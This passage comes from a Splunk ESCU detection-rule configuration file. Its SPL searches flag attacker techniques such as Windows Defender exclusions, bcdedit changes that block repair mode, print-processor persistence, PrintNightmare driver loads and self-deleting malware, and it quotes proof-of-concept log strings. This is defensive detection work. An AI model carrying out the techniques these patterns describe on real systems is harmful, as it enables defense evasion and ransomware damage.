action.notable.param.rule_description = This analytic identifies a common fileless malware staging technique of using .NET classes to directly download a URL payload into memory. The analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution.
action.notable.param.rule_title = PowerShell WebRequest Using Memory Stream
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText IN ("*system.net.webclient*","*system.net.webrequest*") AND ScriptBlockText="*IO.MemoryStream*" | eval Path = case(isnotnull(Path),Path,true(),"unknown") | stats count min(_time) as firstTime max(_time) as lastTime list(ScriptBlockText) as command values(Path) as file_name values(UserID) as user by ActivityID, Computer, EventCode | rename Computer as dest, EventCode as signature_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_webrequest_using_memory_stream_filter`

[ESCU - Powershell Windows Defender Exclusion Commands - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic will detect a suspicious process command line related to the Windows Defender exclusion feature. This command is abused by adversaries, malware authors and red teams to bypass the Windows Defender anti-virus product by excluding folder paths, file paths, processes, extensions, etc. from its real-time or scheduled scans in order to execute their malicious code. This is a good indicator of defense evasion and a reason to look further for events after this behavior.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This analytic will detect a suspicious process command line related to the Windows Defender exclusion feature. This command is abused by adversaries, malware authors and red teams to bypass the Windows Defender anti-virus product by excluding folder paths, file paths, processes, extensions, etc. from its real-time or scheduled scans in order to execute their malicious code. This is a good indicator of defense evasion and a reason to look further for events after this behavior.
action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on processes that includes the name of the process responsible for the changes from your endpoints into the `Endpoint` data model in the `Registry` node. Also make sure that this registry path is included in your config files (e.g. Sysmon config) to be monitored.
action.escu.known_false_positives = Admins or users may choose to use this Windows feature.
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Powershell Windows Defender Exclusion Commands - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["CISA AA22-320A", "AgentTesla", "Remcos", "Windows Defense Evasion Tactics", "Data Destruction", "WhisperGate", "Warzone RAT"]
action.risk = 1
action.risk.param._risk_message = exclusion command $Message$ executed on $ComputerName$
action.risk.param._risk = [{"risk_object_field": "User", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "ComputerName", "risk_object_type": "system", "risk_score": 64}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Powershell Windows Defender Exclusion Commands - Rule
action.correlationsearch.annotations = {"analytic_story": ["CISA AA22-320A", "AgentTesla", "Remcos", "Windows Defense Evasion Tactics", "Data Destruction", "WhisperGate", "Warzone RAT"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic will detect a suspicious process command line related to the Windows Defender exclusion feature. This command is abused by adversaries, malware authors and red teams to bypass the Windows Defender anti-virus product by excluding folder paths, file paths, processes, extensions, etc. from its real-time or scheduled scans in order to execute their malicious code. This is a good indicator of defense evasion and a reason to look further for events after this behavior.
action.notable.param.rule_title = Powershell Windows Defender Exclusion Commands
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 (Message = "*Add-MpPreference *" OR Message = "*Set-MpPreference *") AND Message = "*-exclusion*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode Message ComputerName User | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_windows_defender_exclusion_commands_filter`

[ESCU - Prevent Automatic Repair Mode using Bcdedit - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search is to detect a suspicious bcdedit.exe execution that sets the boot configuration to ignore all failures. This technique was used by ransomware to prevent the compromised machine from automatically booting into repair mode.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search is to detect a suspicious bcdedit.exe execution that sets the boot configuration to ignore all failures. This technique was used by ransomware to prevent the compromised machine from automatically booting into repair mode.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators may modify the boot configuration to ignore failures during testing and debugging.
action.escu.creation_date = 2021-06-10
action.escu.modification_date = 2021-06-10
action.escu.confidence = high
action.escu.full_search_name = ESCU - Prevent Automatic Repair Mode using Bcdedit - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Ransomware", "Chaos Ransomware"]
action.risk = 1
action.risk.param._risk_message = A suspicious process $process_name$ with process id $process_id$ contains commandline $process$ to ignore all bcdedit execution failure in host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Prevent Automatic Repair Mode using Bcdedit - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Chaos Ransomware"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search detects a suspicious bcdedit.exe execution that sets the boot configuration to ignore all failures. This technique has been used by ransomware to prevent the compromised machine from automatically booting into repair mode.
action.notable.param.rule_title = Prevent Automatic Repair Mode using Bcdedit
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "bcdedit.exe" Processes.process = "*bootstatuspolicy*" Processes.process = "*ignoreallfailures*" by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.dest Processes.user Processes.process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `prevent_automatic_repair_mode_using_bcdedit_filter`

[ESCU - Print Processor Registry Autostart - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic detects a suspicious modification or new registry entry related to print processors. This registry key is known to be abused by Turla and other APTs to gain persistence and privilege escalation on the compromised machine. This is done by adding a malicious DLL payload to a newly created key under this registry path, which is executed when the spoolsv.exe process and service are restarted.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.012", "T1547"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic detects a suspicious modification or new registry entry related to print processors. This registry key is known to be abused by Turla and other APTs to gain persistence and privilege escalation on the compromised machine. This is done by adding a malicious DLL payload to a newly created key under this registry path, which is executed when the spoolsv.exe process and service are restarted.
action.escu.how_to_implement = To successfully implement this search, you must be ingesting data that records registry activity from your hosts to populate the endpoint data model in the registry node. This is typically populated via an endpoint detection-and-response product, such as Carbon Black, or endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report reads and writes to the registry.
action.escu.known_false_positives = A new printer installation may add driver components to this registry path.
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Print Processor Registry Autostart - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Data Destruction", "Windows Privilege Escalation", "Hermetic Wiper", "Windows Persistence Techniques"]
action.risk = 1
action.risk.param._risk_message = modified/added/deleted registry entry $Registry.registry_path$ on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Print Processor Registry Autostart - Rule
action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Windows Privilege Escalation", "Hermetic Wiper", "Windows Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.012", "T1547"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic detects a suspicious modification or new registry entry related to print processors. This registry key is known to be abused by Turla and other APTs to gain persistence and privilege escalation on the compromised machine. This is done by adding a malicious DLL payload to a newly created key under this registry path, which is executed when the spoolsv.exe process and service are restarted.
action.notable.param.rule_title = Print Processor Registry Autostart
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path ="*\\Control\\Print\\Environments\\Windows x64\\Print Processors*" by Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `drop_dm_object_name(Registry)` | `print_processor_registry_autostart_filter`

[ESCU - Print Spooler Adding A Printer Driver - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies new printer drivers being loaded by utilizing the Windows PrintService operational logs, EventCode 316. This was identified during our testing of CVE-2021-34527 (previously CVE-2021-1675), or PrintNightmare. \
Within the proof of concept code, the following event will occur - "Printer driver 1234 for Windows x64 Version-3 was added or updated. Files:- UNIDRV.DLL, kernelbase.dll, evil.dll. No user action is required." \
During triage, isolate the endpoint and review for the source of exploitation. Capture any additional file modification events and review the source of where the exploitation began.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.012", "T1547"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies new printer drivers being loaded by utilizing the Windows PrintService operational logs, EventCode 316. This was identified during our testing of CVE-2021-34527 (previously CVE-2021-1675), or PrintNightmare. \
Within the proof of concept code, the following event will occur - "Printer driver 1234 for Windows x64 Version-3 was added or updated. Files:- UNIDRV.DLL, kernelbase.dll, evil.dll. No user action is required." \
During triage, isolate the endpoint and review for the source of exploitation. Capture any additional file modification events and review the source of where the exploitation began.
action.escu.how_to_implement = You will need to ensure PrintService Admin and Operational logs are being logged to Splunk from critical or all systems.
action.escu.known_false_positives = Unknown. This may require filtering.
action.escu.creation_date = 2021-07-01
action.escu.modification_date = 2021-07-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - Print Spooler Adding A Printer Driver - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["PrintNightmare CVE-2021-34527"]
action.risk = 1
action.risk.param._risk_message = Suspicious print driver was loaded on endpoint $ComputerName$.
action.risk.param._risk = [{"risk_object_field": "ComputerName", "risk_object_type": "system", "risk_score": 72}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Print Spooler Adding A Printer Driver - Rule
action.correlationsearch.annotations = {"analytic_story": ["PrintNightmare CVE-2021-34527"], "cis20": ["CIS 10"], "confidence": 90, "cve": ["CVE-2021-34527", "CVE-2021-1675"], "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.012", "T1547"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies new printer drivers being loaded by utilizing the Windows PrintService operational logs, EventCode 316. This was identified during our testing of CVE-2021-34527 (previously CVE-2021-1675), or PrintNightmare. \
Within the proof of concept code, the following event will occur - "Printer driver 1234 for Windows x64 Version-3 was added or updated. Files:- UNIDRV.DLL, kernelbase.dll, evil.dll. No user action is required." \
During triage, isolate the endpoint and review for the source of exploitation. Capture any additional file modification events and review the source of where the exploitation began.
action.notable.param.rule_title = Print Spooler Adding A Printer Driver
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `printservice` EventCode=316 category = "Adding a printer driver" Message = "*kernelbase.dll,*" Message = "*UNIDRV.DLL,*" Message = "*.DLL.*" | stats count min(_time) as firstTime max(_time) as lastTime by OpCode EventCode ComputerName Message | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `print_spooler_adding_a_printer_driver_filter`

[ESCU - Print Spooler Failed to Load a Plug-in - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies driver load errors utilizing the Windows PrintService Admin logs. This was identified during our testing of CVE-2021-34527 (previously CVE-2021-1675), or PrintNightmare. \
Within the proof of concept code, the following error will occur - "The print spooler failed to load a plug-in module C:\Windows\system32\spool\DRIVERS\x64\3\meterpreter.dll, error code 0x45A. See the event user data for context information." \
The analytic is based on file path and failure to load the plug-in. \
During triage, isolate the endpoint and review for the source of exploitation. Capture any additional file modification events.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.012", "T1547"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies driver load errors utilizing the Windows PrintService Admin logs. This was identified during our testing of CVE-2021-34527 (previously CVE-2021-1675), or PrintNightmare. \
Within the proof of concept code, the following error will occur - "The print spooler failed to load a plug-in module C:\Windows\system32\spool\DRIVERS\x64\3\meterpreter.dll, error code 0x45A. See the event user data for context information." \
The analytic is based on file path and failure to load the plug-in. \
During triage, isolate the endpoint and review for the source of exploitation. Capture any additional file modification events.
action.escu.how_to_implement = You will need to ensure PrintService Admin and Operational logs are being logged to Splunk from critical or all systems.
action.escu.known_false_positives = False positives are unknown and filtering may be required.
action.escu.creation_date = 2021-07-01
action.escu.modification_date = 2021-07-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - Print Spooler Failed to Load a Plug-in - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["PrintNightmare CVE-2021-34527"]
action.risk = 1
action.risk.param._risk_message = Suspicious printer spooler errors have occurred on endpoint $ComputerName$ with EventCode $EventCode$.
action.risk.param._risk = [{"risk_object_field": "ComputerName", "risk_object_type": "system", "risk_score": 72}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Print Spooler Failed to Load a Plug-in - Rule
action.correlationsearch.annotations = {"analytic_story": ["PrintNightmare CVE-2021-34527"], "cis20": ["CIS 10"], "confidence": 90, "cve": ["CVE-2021-34527", "CVE-2021-1675"], "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.012", "T1547"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies driver load errors utilizing the Windows PrintService Admin logs. This was identified during our testing of CVE-2021-34527 (previously CVE-2021-1675), or PrintNightmare. \
Within the proof of concept code, the following error will occur - "The print spooler failed to load a plug-in module C:\Windows\system32\spool\DRIVERS\x64\3\meterpreter.dll, error code 0x45A. See the event user data for context information." \
The analytic is based on file path and failure to load the plug-in. \
During triage, isolate the endpoint and review for the source of exploitation. Capture any additional file modification events.
action.notable.param.rule_title = Print Spooler Failed to Load a Plug-in
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `printservice` ((ErrorCode="0x45A" (EventCode="808" OR EventCode="4909")) OR ("The print spooler failed to load a plug-in module" OR "\\drivers\\x64\\")) | stats count min(_time) as firstTime max(_time) as lastTime by OpCode EventCode ComputerName Message | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `print_spooler_failed_to_load_a_plug_in_filter`

[ESCU - Process Creating LNK file in Suspicious Location - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for a process launching an `*.lnk` file under `C:\User*` or `*\Local\Temp\*`. This is common behavior used by various spear phishing tools.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.002"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search looks for a process launching an `*.lnk` file under `C:\User*` or `*\Local\Temp\*`. This is common behavior used by various spear phishing tools.
action.escu.how_to_implement = You must be ingesting data that records filesystem and process activity from your hosts to populate the Endpoint data model. This is typically populated via an endpoint detection-and-response product, such as Carbon Black, or endpoint data sources, such as Sysmon.
action.escu.known_false_positives = This detection should yield little or no false positive results. It is uncommon for LNK files to be executed from temporary or user directories.
action.escu.creation_date = 2021-08-26
action.escu.modification_date = 2021-08-26
action.escu.confidence = high
action.escu.full_search_name = ESCU - Process Creating LNK file in Suspicious Location - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Spearphishing Attachments", "Qakbot", "IcedID", "Amadey"]
action.risk = 1
action.risk.param._risk_message = A process $process_name$ launching a .lnk file in $file_path$ on host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 63}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Process Creating LNK file in Suspicious Location - Rule
action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "Qakbot", "IcedID", "Amadey"], "cis20": ["CIS 13"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.002"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for a process launching an `*.lnk` file under `C:\User*` or `*\Local\Temp\*`. This is common behavior used by various spear phishing tools.
action.notable.param.rule_title = Process Creating LNK file in Suspicious Location
action.notable.param.security_domain = network
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_name="*.lnk" AND (Filesystem.file_path="C:\\User\\*" OR Filesystem.file_path="*\\Temp\\*") by _time span=1h Filesystem.process_guid Filesystem.file_name Filesystem.file_path Filesystem.file_hash Filesystem.user | `drop_dm_object_name(Filesystem)` | rename process_guid as lnk_guid | join lnk_guid, _time [| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=* by _time span=1h Processes.parent_process_guid Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process | `drop_dm_object_name(Processes)` | rename parent_process_guid as lnk_guid | fields _time lnk_guid process_id dest process_name process_path process] | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | table firstTime, lastTime, lnk_guid, process_id, user, dest, file_name, file_path, process_name, process, process_path, file_hash | `process_creating_lnk_file_in_suspicious_location_filter`

[ESCU - Process Deleting Its Process File Path - Rule]
action.escu = 0
action.escu.enabled = 1
description = This detection identifies a suspicious process that tries to delete the file path of its own process. This technique is a known defense evasion, used once a certain malware condition is or is not satisfied. Clop ransomware uses this technique: it tries to delete its own process file path using a .bat command if the keyboard layout is not the one it intends to infect.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This detection identifies a suspicious process that tries to delete the file path of its own process. This technique is a known defense evasion, used once a certain malware condition is or is not satisfied. Clop ransomware uses this technique: it tries to delete its own process file path using a .bat command if the keyboard layout is not the one it intends to infect.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Unknown.
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Process Deleting Its Process File Path - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Sysmon"]
action.escu.analytic_story = ["Clop Ransomware", "Data Destruction", "WhisperGate", "Remcos"]
action.risk = 1
action.risk.param._risk_message = A process $Image$ tries to delete its own process path via command line $CommandLine$ as part of defense evasion on host $dest$ by user $user$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 60}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 60}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Process Deleting Its Process File Path - Rule
action.correlationsearch.annotations = {"analytic_story": ["Clop Ransomware", "Data Destruction", "WhisperGate", "Remcos"], "cis20": ["CIS 10"], "confidence": 100, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This detection identifies a suspicious process that tries to delete the file path of its own process. This technique is a known defense evasion, used once a certain malware condition is or is not satisfied. Clop ransomware uses this technique: it tries to delete its own process file path using a .bat command if the keyboard layout is not the one it intends to infect.
action.notable.param.rule_title = Process Deleting Its Process File Path
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `sysmon` EventCode=1 CommandLine = "* /c *" CommandLine = "* del*" Image = "*\\cmd.exe" | eval result = if(like(process,"%".parent_process."%"), "Found", "Not Found") | stats min(_time) as firstTime max(_time) as lastTime count by dest user ParentImage ParentCommandLine Image CommandLine EventCode ProcessID result | where result = "Found" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `process_deleting_its_process_file_path_filter`

[ESCU - Process Execution via WMI - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies `WmiPrvSE.exe` spawning a process. This typically occurs when a process is instantiated from a local or remote process using `wmic.exe`. During triage, review parallel processes for suspicious behavior or commands executed. Review the process and command-line spawning from `wmiprvse.exe`. Contain and remediate the endpoint as necessary.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies `WmiPrvSE.exe` spawning a process. This typically occurs when a process is instantiated from a local or remote process using `wmic.exe`. During triage, review parallel processes for suspicious behavior or commands executed. Review the process and command-line spawning from `wmiprvse.exe`. Contain and remediate the endpoint as necessary.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Although unlikely, administrators may use WMI to execute commands for legitimate purposes.
action.escu.creation_date = 2020-03-16
action.escu.modification_date = 2020-03-16
action.escu.confidence = high
action.escu.full_search_name = ESCU - Process Execution via WMI - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Suspicious WMI Use"]
action.risk = 1
action.risk.param._risk_message = A remote instance execution of wmic.exe that will spawn $parent_process_name$ on host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Process Execution via WMI - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious WMI Use"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies `WmiPrvSE.exe` spawning a process. This typically occurs when a process is instantiated from a local or remote process using `wmic.exe`. During triage, review parallel processes for suspicious behavior or commands executed. Review the process and command-line spawning from `wmiprvse.exe`. Contain and remediate the endpoint as necessary.
action.notable.param.rule_title = Process Execution via WMI
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=WmiPrvSE.exe by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `process_execution_via_wmi_filter`

[ESCU - Process Kill Base On File Path - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies the use of `wmic.exe` using `delete` to remove an executable path. This is typically run via a batch file during the beginning stages of an adversary setting up for mining on an endpoint.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies the use of `wmic.exe` using `delete` to remove an executable path. This is typically run via a batch file during the beginning stages of an adversary setting up for mining on an endpoint.
